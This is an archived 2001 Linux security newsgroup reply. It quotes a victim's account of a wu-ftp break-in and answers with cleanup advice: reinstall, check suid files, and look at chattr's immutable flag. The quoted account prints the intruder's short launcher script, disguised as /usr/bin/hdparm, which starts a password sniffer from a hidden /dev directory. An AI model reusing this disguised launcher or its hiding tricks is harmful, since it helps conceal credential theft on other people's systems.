Re: ftp was hacked

From: Bill Unruh (unruh@physics.ubc.ca)
Date: 12/29/01


From: unruh@physics.ubc.ca (Bill Unruh)
Date: 29 Dec 2001 20:39:38 GMT

In <Pine.LNX.4.43.0112281603150.13038-100000@styx.darbonne.com> "R.A.Wilson" <bud@styx.darbonne.com> writes:

]Hi -
]I have some info to pass along, and a question...

]A cracker exploited a hole in wu-ftp 2.6.0 and managed to install
]a sniffer and a port scanner on my machine. I use slackware, 2.2.16

]The only reason I found out is that a sharp Linux administrator noted
]port scans coming from my machine and wanted to know what was going on.
]I looked like the bad guy.

]After a lot of work, I found the intruder had made a directory where
]he put his sniffer log and other programs. He had them set up in:
] /dev/ida/.inet
]I don't believe that's a legitimate diretory.

]When I looked at a file called tcp.log, in that directory, I was
]stunned to see he had plain text passwords of all the users on my
]machine. I couldn't pull the plug fast enough!

]He also had managed to put an illegal account in /etc/passwd. He used
]the account name www. I found files belonging to www and rm'd them.
]I also took him out of the passwd file. I updated wu-ftp to the latest
]version of 2.6.2 and thought that solved the problem.

]A few days later I wanted to install a later version of hdparm. I was
]using version 3.9 and 4.6 was out. I did a 'locate hdparm' and found
]two of them: one in /use/bin/hdparm and the other in /use/sbin.hdparm.
]Which was correct? I did 'which hdparm' and found the one in /usr/sbin
]was it. it was also a binary file. Curious, I looked at the other one.
]This is what it looked like:

] #!/bin/sh
] cd /dev/ida/.inet
] ./sshdu -f ./s
] ./linsniffer >> ./tcp.log &
] cd /

]So, just by a lucky accident I had discovered the intruder's script to
]call his sniffer.

]I tried to move the file. I tried to edit the file. I tried to remove
]it. Nothing. Root cannot touch it! Here's the system message I get
]when I try any of the above...

] cannot unlink 'hdparm': Operation not permitted.

]Now my question... HOW THE HELL DO I GET RID OF THIS GARBAGE???

] -Roy Wilson-
]===================================================================

What you do is to backup all of your users files and then you wipe the
disk and reinstall, making sure that you install all of the security
patches. Then you replace the backup material that you need. Then you
scan all of that backed up material for suid files and get rid of them.
eg
find /home -perm +6000 -ls

PS In answer to your question, read
man chattr, especially the -i flag.

But as you have discovered the chances of your finding all of the
backdoors he has installed are nill.
So do not try. Just reinstall, and remmember to keep up with security
patches. That hole was patched about a year ago.



Relevant Pages

  • ftp was hacked
    ... a sniffer and a port scanner on my machine. ... port scans coming from my machine and wanted to know what was going on. ... A few days later I wanted to install a later version of hdparm. ...
    (comp.os.linux.security)
  • Re: ftp was hacked
    ... > a sniffer and a port scanner on my machine. ... I updated wu-ftp to the latest ... > A few days later I wanted to install a later version of hdparm. ...
    (comp.os.linux.security)
  • Re: ftp was hacked
    ... > sniffer and a port scanner on my machine. ... I updated wu-ftp to the latest ... > A few days later I wanted to install a later version of hdparm. ...
    (comp.os.linux.security)
  • Re: a spy problem
    ... > The company would like to install a sniffer that would ... Is it necessary to install it to all the ... An other option is to add a Linux host to the network running dsniff, ... If you spy your network you have to inform your employees ...
    (Security-Basics)
  • Re: Sniffer - Where to install
    ... there a sniffer that comes with windows 2000 and can be installed on XP ... I've read in the manual that I should install it ... again how do I set the sniffer to see the switch and would it see all ...
    (microsoft.public.win2000.security)